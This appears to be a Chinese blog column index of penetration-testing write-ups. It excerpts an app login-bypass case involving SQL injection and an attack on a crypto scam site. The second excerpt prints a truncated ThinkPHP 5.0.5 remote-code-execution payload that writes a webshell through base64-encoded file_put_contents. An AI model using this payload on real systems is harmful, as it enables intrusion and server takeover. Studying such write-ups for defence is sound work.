渗透实战
关注
分享
扫一扫
「已注销」
公众号 猪猪谈安全 获取大量学习资源!
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
App渗透 - 从SQL注入到人脸识别登录绕过
App渗透 - 人脸识别登录绕过打开APP是一个登录框抓包后发现参数被加密了使用Jadx脱源码发现,并没有加壳也没有混淆,运气很好根据经验,先搜索Encrypt、Decrypt等关键字,发现在Common.js中有一个encryptData函数定位过去,一套加解密算法都写好了放在这放到浏览器console里面调试,果然没错首先测试了一下注入明文:{"userName":"TEST'","passWord":"123456","osType":"android","osVer转载 2020-10-05 15:49:06 · 2099 阅读 · 1 评论 -
某杀猪盘渗透测试
最近偶然发现一个虚拟货币买涨跌的杀猪盘,遂进行了一波测试,前台长这样。为thinkphp5.0.5随用RCE进行打入,成功写入webshell。s=index|think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@file_put_contents(base64_decode(MTIzNDUucGhw),base64_decode(MTI8P3BocCBldmF转载 2020-09-08 22:15:59 · 1407 阅读 · 2 评论